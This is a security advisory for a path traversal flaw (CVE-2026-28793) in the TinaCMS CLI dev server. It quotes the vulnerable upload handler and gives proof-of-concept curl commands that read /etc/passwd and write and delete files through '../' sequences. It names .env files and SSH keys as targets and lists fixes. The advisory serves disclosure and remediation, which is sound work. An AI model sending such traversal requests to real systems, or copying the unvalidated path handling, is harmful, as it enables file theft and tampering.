GHSA-2f24-mg4x-534q

Source

https://github.com/advisories/GHSA-2f24-mg4x-534q

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-2f24-mg4x-534q/GHSA-2f24-mg4x-534q.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-2f24-mg4x-534q

Aliases

CVE-2026-28793

Published

2026-03-12T20:32:26Z

Modified

2026-03-14T06:58:46.428588Z

Severity

8.4 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator

Summary

TinaCMS Vulnerable to Path Traversal Leading to Arbitrary File Read, Write and Delete

Details

Summary

The TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory.

Details

When running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as:

/media/list/*
/media/upload/*
/media/*

These endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory.

Vulnerable code

bb.on('file', async (_name, file, _info) => {
      const fullPath = decodeURI(req.url?.slice('/media/upload/'.length));
      const saveTo = path.join(mediaFolder, ...fullPath.split('/'));
// No validation that saveTo remains within mediaFolder
      await fs.ensureDir(path.dirname(saveTo));
      file.pipe(fs.createWriteStream(saveTo));
    });

PoC

Arbitrary File Read

curl "http://localhost:4001/media/list/../../../etc/passwd"

Result:

Arbitrary File Write

echo "ATTACKER_CONTROLLED_CONTENT" > /tmp/payload.txt

curl --path-as-is -X POST \
  "http://localhost:4001/media/upload/../../../../../../tmp/pwned.txt" \
  -F "file=@/tmp/payload.txt"
cat /tmp/pwned.txt

Result: <img width="1320" height="84" alt="image(8)" src="https://github.com/user-attachments/assets/8bd5046b-0456-474f-ab96-4e18a421997c" />

Arbitrary File Delete

echo "delete_me" > /tmp/delete-test.txt
cat /tmp/delete-test.txt # confirms file exists
curl --path-as-is -X DELETE \
"http://localhost:4001/media/../../../../../../tmp/delete-test.txt"
cat /tmp/delete-test.txt # "No such file or directory"

Impact

An attacker who can reach the TinaCMS CLI dev server can:

Read arbitrary files (e.g. /etc/passwd, .env, SSH keys)
Write arbitrary files anywhere writable by the server process
Delete or overwrite files, depending on endpoint usage
Escalate to code execution in realistic development setups by overwriting executable scripts, configuration files, or watched source files

Attack Surface

The dev server binds to localhost by default, but exploitation is realistic in:

Cloud IDEs (Codespaces, Gitpod)
Docker or VM setups with port forwarding
Misconfigured dev environments binding to 0.0.0.0
Local malware or malicious dependencies

The server also enables permissive CORS, which may allow browser-based exploitation if the dev server is externally reachable, but CORS is not required for exploitation.

Recommended Fix

Resolve paths to absolute form
Enforce that resolved paths remain within the media root
Reject .. path segments and absolute paths
Consider authentication or token protection for dev server endpoints

Database specific

{
    "github_reviewed": true,
    "nvd_published_at": "2026-03-12T17:16:50Z",
    "cwe_ids": [
        "CWE-22"
    ],
    "github_reviewed_at": "2026-03-12T20:32:26Z",
    "severity": "HIGH"
}

References

Affected packages

npm / @tinacms/cli

Package

Name: @tinacms/cli; View open source insights on deps.dev
Purl: pkg:npm/%40tinacms/cli

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

2.1.8

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-2f24-mg4x-534q/GHSA-2f24-mg4x-534q.json"